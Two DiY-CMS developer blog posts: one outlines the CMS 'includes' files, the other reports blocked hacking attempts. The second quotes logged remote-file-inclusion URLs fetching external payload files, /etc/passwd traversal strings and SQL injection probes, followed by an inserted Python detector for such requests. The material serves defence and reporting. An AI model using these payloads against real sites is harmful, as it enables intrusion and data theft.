

Learning the structure of DiY-CMS folders and file - Part 3

By: admin | Date Added: Tuesday 09-11-2010 05:25 am

This is the third post directed at developers rather than end users. In this post I will talk about the files in the “includes” folder in the root DiY-CMS directory. Knowing the task of each file will help a developer understand the architecture of DiY-CMS and its data flow.




The includes folder contains the files responsible for the main tasks that run DiY-CMS and control the different aspects of the CMS.

Here is the list of folders and files:
PHPMailer folder: This folder contains the folders and files of the popular mail library PHPMailer. It is the standard component DiY-CMS uses to send emails for notifications and other purposes.

bbcode.class.php: This file contains the class that handles bbcode format.

blocks.class.php: This file handles the arrangement of blocks (menus) in the DiY-CMS view.

date_conversion.class.php: This class handles date conversion in DiY-CMS. It converts Gregorian dates to Hijri (Islamic lunar) dates and vice versa.

email.class.php: This class wraps the functions of PHPMailer and groups them in one class to ease their use.

files.class.php: This class handles file read and write functions.

form.class.php: This file contains the functions needed to produce a form with different fields, such as creating an input field or textarea.

general.functions.php: This file contains general functions, such as those handling the page header, the page footer, and error or message display.

hooks.functions.php: This file handles hook management in DiY-CMS. You can use it to place a hook at a certain point in the module or plug-in you develop. Alternatively, you can use it to hook your own functions to the built-in hooks in DiY-CMS. (I will explain in detail how hooks work in a future post.)

keyword_generator.class.php: This class is used to generate keywords on the fly for posts in DiY-CMS. It increases the search-engine friendliness of posts.

login.class.php: This file controls users’ authentication in DiY-CMS.

module.class.php: This file is responsible for module management. It checks the module’s status, loads its templates, loads its settings and runs the module.

mysql.class.php: This file contains the functions that manage the database connection, querying and database error handling.

plugins.class.php: This file handles plug-in management. It loads all the active plug-ins, loads their settings and permissions, and then runs the plug-ins.

post.functions.php: This file contains post-related functions, including post sanitisation, SQL injection prevention, required-field checks and other functions.

protection.php: This file mainly prevents XSS attacks on DiY-CMS.

session.class.php: This class handles sessions.

spam.class.php: This class prevents post spamming in DiY-CMS by checking the IP address and the time interval between two consecutive posts of the same user.
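As an added illustration (not DiY-CMS’s own spam.class.php, whose internals this post does not show), here is a small Python throttle that applies the two checks the class is described as making: the time since the same user’s last post, and the time since the last post from the same IP address. The 30-second minimum interval, the class name and the choice to key on user and IP separately are assumptions of the example.

```python
import time


class PostThrottle:
    """Reject a post if the same user OR the same IP posted within min_interval.

    Keying on user and IP separately (an assumption of this example) means that
    one account posting from many addresses, and many accounts posting from one
    address, are both slowed down.
    """

    def __init__(self, min_interval_seconds: float = 30.0):
        self.min_interval = min_interval_seconds
        self._last_by_user = {}  # user id -> timestamp of last accepted post
        self._last_by_ip = {}    # ip address -> timestamp of last accepted post

    def allow(self, user_id: str, ip: str, now=None) -> bool:
        """Return True and record the post if it passes both interval checks.

        `now` may be supplied for testing; it defaults to the current time.
        """
        if now is None:
            now = time.time()
        for table, key in ((self._last_by_user, user_id), (self._last_by_ip, ip)):
            last = table.get(key)
            if last is not None and now - last < self.min_interval:
                return False  # rejected: nothing is recorded for a refused post
        self._last_by_user[user_id] = now
        self._last_by_ip[ip] = now
        return True


if __name__ == "__main__":
    throttle = PostThrottle(30.0)
    print(throttle.allow("alice", "10.0.0.1", now=0.0))   # first post: accepted
    print(throttle.allow("bob", "10.0.0.1", now=10.0))    # same IP too soon: refused
    print(throttle.allow("alice", "10.0.0.1", now=40.0))  # interval elapsed: accepted
```

Only accepted posts update the timestamps, so a flood of refused posts cannot keep pushing the window forward for a legitimate user on the same address.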

templae.class.php: This class handles theme-related tasks. It checks which theme is selected, loads its templates, processes their content and then outputs the page.

upload.class.php: This class handles file uploads in DiY-CMS. It can handle adding or editing multiple files at the same time.

I hope you liked this post, and I look forward to hearing your comments and suggestions.


Tags: DiY-CMS-structure

Yeah! Preventing more than 3000 hacking attempts

By: admin | Date Added: Wednesday 03-11-2010 09:27 am

Security is one of the most important criteria for any script one would like to use. In this post I will talk about security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th, http://www.diy-cms.com has prevented more than 3000 hacking attempts across both the English and the Arabic sections. Bear in mind that these are only the recorded attempts; SQL injection through forms, for example, is prevented but not recorded, for a number of reasons.

Examples of attempts:
Several methods were used to try to hack into DiY-CMS, including remote file inclusion, SQL injection and attempts to access root folders and files.
Here are a few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1
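As an added example that is not part of the original post and not DiY-CMS’s own protection code, the following Python script classifies request lines of the kinds quoted above (remote file inclusion, directory traversal, probing of server folders, and SQL injection) so that a list such as html/bugs.txt can be tallied by attack type. The sample requests are constructed here, modelled on the quoted patterns with SITE-NAME placeholders; the category names, the regular expressions and the `classify`/`summarize` function names are this example’s own assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample request lines, modelled on the patterns quoted in the post
# (site names replaced with SITE-NAME). The last line is an ordinary request.
SAMPLE_REQUESTS = [
    "/mod.php?mod=http://www.SITE-NAME.com.mx/admin/xroot.txt?",
    "/?path=http://stul.SITE-NAME.cz/img/.jancuk/injek.txt??",
    "/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??",
    "/mod.php?mod=../../../../../../../../etc/passwd%00",
    "/index.php?option=com_myblog&Itemid=12&task=../../../../etc/passwd%00",
    "/cgi-bin/root",
    '/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null%20where%20"x"="x',
    "/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20limit%2019,1),3,1))",
    "/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0/*%20and%201=1",
    "/mod.php?mod=blog&modfile=index&page=2",
]

# A parameter value that is itself a URL: the remote file inclusion shape.
RFI_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Parent-directory hops, a null byte used to cut off an appended suffix,
# or a direct reach for /etc/passwd.
TRAVERSAL_RE = re.compile(r"\.\./|\x00|/etc/passwd", re.IGNORECASE)
# UNION ... SELECT probes, character-by-character extraction via
# ascii(substring(...)), and reads of the MySQL catalogue.
SQLI_RE = re.compile(
    r"\bunion\b.{0,40}\bselect\b|ascii\s*\(\s*substring|information_schema",
    re.IGNORECASE | re.DOTALL,
)


def classify(raw_request: str) -> set:
    """Return the set of attack categories a request line matches (empty if none)."""
    parts = urlsplit(raw_request)
    decoded = unquote_plus(raw_request)  # inspect the percent-decoded form
    tags = set()
    # parse_qsl decodes each value, so an "http://..." value is seen even if encoded.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if RFI_RE.match(value):
            tags.add("rfi")
    if TRAVERSAL_RE.search(decoded):
        tags.add("traversal")
    if SQLI_RE.search(decoded):
        tags.add("sqli")
    # Bare requests for /cgi-bin/<name> with no query string are scanner probes
    # for server folders that a CMS front controller never serves.
    if parts.path.startswith("/cgi-bin/") and not parts.query:
        tags.add("probe")
    return tags


def summarize(requests) -> dict:
    """Count requests per category; untagged requests are counted as 'benign'."""
    counts = Counter()
    for req in requests:
        for tag in (classify(req) or {"benign"}):
            counts[tag] += 1
    return dict(counts)


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(sorted(classify(req)) or ["benign"], req[:70])
    print(summarize(SAMPLE_REQUESTS))
```

Matching is done on the percent-decoded request so that encoded spaces, quotes and null bytes do not hide a pattern, and each query value is checked on its own for the remote file inclusion case, since the URL can sit in any parameter name (`mod`, `path`, `config[openi_dir]` in the examples above).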


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries from which attempts originated:




And here is the full list of countries from which attempts originated, with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post shows how strong DiY-CMS is when it comes to security and preventing hacking attempts, and I will keep adding more security measures to it.

If you want to check the types of hacking attempts your site is getting, look at the “html/bugs.txt” file for the list of all recorded hacking attempts.


Tags: prevent-hacking-
